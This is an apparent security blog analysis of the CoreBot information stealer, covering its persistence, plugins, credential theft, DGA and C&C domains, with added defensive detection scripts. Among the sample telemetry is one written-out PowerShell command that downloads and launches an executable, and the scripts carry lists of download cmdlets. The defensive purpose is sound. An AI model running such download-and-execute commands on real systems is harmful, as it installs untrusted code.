When it comes to discovering new malware, it is much more common for researchers to run across information stealers, ransomware and remote-access tools (RATs) than it is to encounter brand new complex codes like banking Trojans or targeted attack tools such as Duqu.

Nonetheless, it is the lesser breeds, like information stealers and RATs, that are far more prolific in the wild. And while banking Trojans or targeted attack tools are quite specific in what they do, information stealers are far less discriminating and thus end up affecting a greater number of people and organizations.

That brings us to CoreBot, a new information stealer discovered and analyzed by IBM Security X-Force researchers, who indicate this is one malware piece to watch out for. CoreBot appears to be quite modular, which means that its structure and internal makeup were programmed in a way that allows for the easy adding of new data theft and endpoint control mechanisms.

CoreBot was discovered while the researchers were studying the activity of malware on Trusteer-protected enterprise endpoints. The malware’s compiled file was named “core” by its developer. Antivirus engines do not specify this malware’s name yet and detect it under generic names such as Dynamer!ac or Eldorado. But while CoreBot may appear artless at first glance, without real-time theft capabilities, it is more interesting on the inside.


Info Stealers: Prevalence and Risk Factors

When it comes to generic malware, many believe it is less targeted and therefore less damaging than more elaborate malcode. In reality, the opposite is true. Generic malware is frequently the sort of Trojan that harvests passwords indiscriminately, which ends up compromising a broader set of the user’s personal accounts, including bank account credentials, email and e-wallets. When they land on an enterprise endpoint, information stealers gather email credentials, software keys and anything else saved on that drive that could be of interest to attackers. On top of that, they can download and execute other malware at will.

Many times, infostealer Trojan botnets siphon this sort of data from a myriad of endpoints and trade it in the underground, selling it to cybercriminals who will find ways to use or monetize it.

In a recent report released by IBM Security about enterprise threats, data collected from Trusteer Apex Advanced Malware Protection showed that the most rampant type of malware targeting employee endpoints in July 2015 was info stealers.

CoreBot Infiltrates PCs via Dropper

To begin, CoreBot infiltrates new endpoints by means of a dropper. Once the dropper is executed, it launches a svchost process in order to write the malware file to disk and then launch it. The dropper then exits.

Sets Persistence

Next, CoreBot generates a globally unique identifier (GUID) using the CoCreateGuid API call. CoreBot uses the GUID as the name of its persistence entry, a value under the Run key in the Windows Registry. For example:

RegSetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Run\f9111abc-8f81-200b-8b4a-bd8fd4a43b8h
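A GUID-named value under the Run key is a usable triage signal for defenders. The following Python script is an added example, not code from the original post or from IBM: it scans constructed Sysmon-style "registry value set" lines (Event ID 13) for Run/RunOnce values whose name is a GUID and reports which process wrote them and whether the launched file lives in a user-writable directory. The log line format, the field names and all sample values (including the GUIDs) are assumptions made for this example.

```python
import re

# Constructed Sysmon-style Event ID 13 (RegistryEvent: value set) lines.
# These are sample lines written for this example, not real telemetry.
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\3f2504e0-4f89-11d3-9a0c-0305e82c3301 Details=C:\Users\alice\AppData\Roaming\core.exe",
    r"EventID=13 Image=C:\Program Files\Vendor\setup.exe TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater Details=C:\Program Files\Vendor\updater.exe",
    r"EventID=13 Image=C:\Windows\explorer.exe TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden Details=DWORD (0x00000001)",
    r"EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\{6BA2A1D3-0C4E-4F0B-9E59-5E1A7C9B2F10} Details=C:\ProgramData\x\core.exe",
]

# Matches a value name directly under ...\CurrentVersion\Run or \RunOnce.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\(?P<name>[^\\]+)$", re.IGNORECASE)
# Matches an 8-4-4-4-12 hex GUID, with or without surrounding braces.
GUID_RE = re.compile(
    r"^\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?$", re.IGNORECASE
)
# Directories an unprivileged user can write to; autostarts pointing here deserve a look.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")


def parse_event(line):
    """Split a 'Key=Value Key=Value' line into a dict (values may contain spaces)."""
    return {m.group(1): m.group(2) for m in re.finditer(r"(\w+)=(.*?)(?=\s\w+=|$)", line)}


def in_user_writable_dir(path):
    return any(tok in path.lower() for tok in USER_WRITABLE)


def find_guid_run_entries(lines):
    """Return Run-key values whose name is a GUID, with the writer and launch target."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13":
            continue
        m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
        if not m or not GUID_RE.match(m.group("name")):
            continue
        hits.append({
            "value_name": m.group("name"),
            "writer": ev.get("Image", ""),
            "target": ev.get("Details", ""),
            "user_writable_target": in_user_writable_dir(ev.get("Details", "")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_guid_run_entries(SAMPLE_EVENTS):
        print(hit)
```

A GUID-named Run value is not malicious on its own (some legitimate installers use them), so the script keeps the writing process and the target path alongside the name; an autostart written by svchost.exe that points into a user profile or ProgramData is the combination worth escalating.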


Modular Plugin System

CoreBot’s most interesting facility is its plugin system, enabling it to be modular and easily supplemented with new theft capabilities. CoreBot downloads plugins from its command-and-control (C&C) server right after setting its persistence mechanism on the endpoint. It then loads the plugins using the plugininit export function in the plugin’s DLL.

At present, the main plugin is called Stealer. The MD5 of that plugin is:

ce890607d0f0581a1afc9b3a8f6e012d


CoreBot steals passwords, but it is currently incapable of intercepting real-time data from Web browsers. Instead, it steals saved passwords stored in the endpoint’s browsers, scanning for passwords on all the most popular browsers.

CoreBot further searches an extensive list of FTP clients, mail clients, webmail accounts, cryptocurrency wallets, private certificates and personal data from a list of various desktop applications.

The example below shows how CoreBot scans for private certificates in store and then steals them:

Domain Generation Algorithm (DGA)

Unlike most information stealers, CoreBot has a domain generation algorithm (DGA) in place, although it is not presently activated. The DGA is a feature designed to enable malware botnets to communicate with their central C&C through dynamically generated domain names. With the DGA, the domain name is supposed to only be known in advance to the malware’s operator, thus preventing security researchers from being able to take down the site or for other criminals to hijack the botnet.

In CoreBot’s case, the DGA parameters appear to generate different domains for geographical zones of the botnet and for groups of bots defined by the botmaster — a rather interesting concept for malware that is merely a generic stealer.

Upon infection of a new endpoint, CoreBot calls home with a live signal and downloads the Stealer plugin. The malware communicates with two domains: vincenzo-sorelli[.]com and arijoputane[.]com.

Both of CoreBot’s communication domains were registered by the same person, email address and Russia-based physical address. A WHOIS lookup brings up personal details.
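The plugin hash and the two C&C domains given above are the concrete indicators this post provides. The script below is an added example (not IBM's code) showing how a defender would operationalise them: it refangs the bracketed domains, matches DNS query log lines against them (including subdomains, while rejecting look-alike names), and compares a file's MD5 with the Stealer plugin hash. The DNS log format and the sample lines are assumptions constructed for this example; only the hash and the two domains come from the post.

```python
import hashlib
import re

# Indicators quoted from the analysis above (domains kept defanged, as published).
STEALER_PLUGIN_MD5 = "ce890607d0f0581a1afc9b3a8f6e012d"
C2_DOMAINS_DEFANGED = ["vincenzo-sorelli[.]com", "arijoputane[.]com"]


def refang(indicator):
    """Turn a defanged indicator back into a matchable, normalised hostname."""
    s = indicator.strip().lower()
    for defanged, real in (("[.]", "."), ("(.)", "."), ("hxxp", "http")):
        s = s.replace(defanged, real)
    return s.rstrip(".")


C2_DOMAINS = {refang(d) for d in C2_DOMAINS_DEFANGED}


def domain_matches(query, iocs=C2_DOMAINS):
    """True for an exact match or a subdomain of an indicator (not for look-alikes)."""
    q = query.lower().rstrip(".")
    return any(q == ioc or q.endswith("." + ioc) for ioc in iocs)


def find_c2_queries(dns_log_lines):
    """Return the queried names that match a C&C indicator, in log order."""
    hits = []
    for line in dns_log_lines:
        m = re.search(r"query:\s*(\S+)", line)
        if m and domain_matches(m.group(1)):
            hits.append(m.group(1).rstrip("."))
    return hits


def md5_matches_stealer(data):
    """Compare a file's bytes against the published Stealer plugin MD5."""
    return hashlib.md5(data).hexdigest() == STEALER_PLUGIN_MD5


# Constructed resolver log lines in a BIND-like query-log style (not real telemetry).
SAMPLE_DNS_LOG = [
    "2015-08-20T10:01:02Z client 10.0.0.5#53124: query: www.example.com IN A",
    "2015-08-20T10:01:09Z client 10.0.0.5#53130: query: vincenzo-sorelli.com IN A",
    "2015-08-20T10:02:41Z client 10.0.0.7#49812: query: arijoputane.com. IN A",
    "2015-08-20T10:03:00Z client 10.0.0.9#50001: query: notarijoputane.com IN A",
]

if __name__ == "__main__":
    print(find_c2_queries(SAMPLE_DNS_LOG))
```

The subdomain rule (`endswith("." + ioc)`) matters in both directions: it catches `www.arijoputane.com` but does not flag `notarijoputane.com`, which a naive substring check would. Hash matching is exact by nature and will miss any rebuilt plugin, so treat it as confirmation of a known sample rather than as coverage.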

The Risks of CoreBot Malware for Organizations

Password and Data Collection

On infected employee endpoints, malware such as CoreBot can harvest access credentials to a plethora of resources used by the employee for work and for personal browsing. Since corporate passwords are all too often reused on other websites, fraudsters can attempt to use the stolen credentials to infiltrate the organization, send malware to other users and expand the overall compromise.

It is important to keep in mind that Trojan operators will typically exfiltrate confidential business data like customer information, budget plans or even confidential insider information. Therefore, even a few infected endpoints inside the organization can end in very significant data security consequences.

Download and Launch Other Malware

Using Windows PowerShell, Microsoft’s task automation and configuration management framework, CoreBot can download other malware from the Internet and execute it on the infected PC.

CoreBot also updates itself the same way: it downloads and launches new versions of its own executable, based on the predefined version parameters of the copy already running on the infected machine.
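The download-and-launch behaviour described in the two paragraphs above leaves a recognisable trace in process-creation telemetry: a PowerShell process whose parent is not an interactive shell, whose command line references a download cmdlet or .NET web client, and which then starts a file from a user-writable path. The script below is an added example, not IBM's code or detection content, that scores constructed process-creation records on those signals. The record fields, the parent-process allow-list, the thresholds and every sample value (including the `core.exe` parent and `example.invalid` URL) are assumptions made for this example.

```python
import re

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Users\alice\AppData\Roaming\core.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -Command (New-Object Net.WebClient).DownloadFile('http://example.invalid/core_v2.exe','C:\Users\alice\AppData\Local\Temp\core_v2.exe'); Start-Process C:\Users\alice\AppData\Local\Temp\core_v2.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe -Command Get-Process"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -Command Invoke-WebRequest https://intranet.example.invalid/report.csv -OutFile C:\Users\alice\Documents\report.csv"},
]

# Cmdlets and .NET types commonly used to fetch content from the network.
DOWNLOAD_PATTERNS = [r"Net\.WebClient", r"DownloadFile", r"DownloadString",
                     r"Invoke-WebRequest", r"\biwr\b", r"Start-BitsTransfer"]
# Ways of executing a file that was just written.
LAUNCH_PATTERNS = [r"Start-Process", r"Invoke-Item", r"Invoke-Expression", r"\biex\b"]
# Parents from which PowerShell is normally launched in this (assumed) environment.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "windowsterminal.exe", "code.exe"}
# Paths an unprivileged process can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def score_event(ev):
    """Return the list of signals an event triggers; more signals means higher priority."""
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if any(re.search(p, cmd, re.IGNORECASE) for p in DOWNLOAD_PATTERNS):
        reasons.append("downloads content")
    if any(re.search(p, cmd, re.IGNORECASE) for p in LAUNCH_PATTERNS):
        reasons.append("launches a file")
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unusual parent: {parent}")
    if any(tok in cmd.lower() for tok in USER_WRITABLE):
        reasons.append("references a user-writable path")
    return reasons


def triage(events, threshold=3):
    """Keep only PowerShell events that trigger at least `threshold` signals."""
    flagged = []
    for ev in events:
        if not ev.get("Image", "").lower().endswith("powershell.exe"):
            continue
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            flagged.append({"parent": ev["ParentImage"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for item in triage(SAMPLE_PROCESS_EVENTS):
        print(item)
```

No single signal is conclusive: administrators download files with `Invoke-WebRequest` every day, which is why the fourth sample record scores low. The combination of an unusual parent, a download, a launch and a temp-directory path is what separates an updater-style malware action from routine scripting, and the threshold is the knob to tune against an environment's own baseline.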

Stop the Inevitable

Any malware on enterprise endpoints is bad news for the organization, but avoiding malware is, in reality, nearly impossible. In almost all cases of malware infiltrating employee endpoints, the malicious file was probably opened by the employee from unsolicited email or inadvertently contracted while browsing infected or watering-hole attack sites.

One of the best ways to protect enterprise endpoints is to supplement employee awareness with specialized protection that can stop malware at the exploitation or launch stages, but also stifle its data exfiltration attempts if it is already on the endpoint.

Proper detection and classification of malware like CoreBot, beyond merely generic designation, is necessary in order to properly assess the risk level it poses. Security Intelligence is writing about this because, although CoreBot isn’t very sophisticated right now, it is still new malware designed to be easily updated, and it could evolve into a more complex threat in the near future.
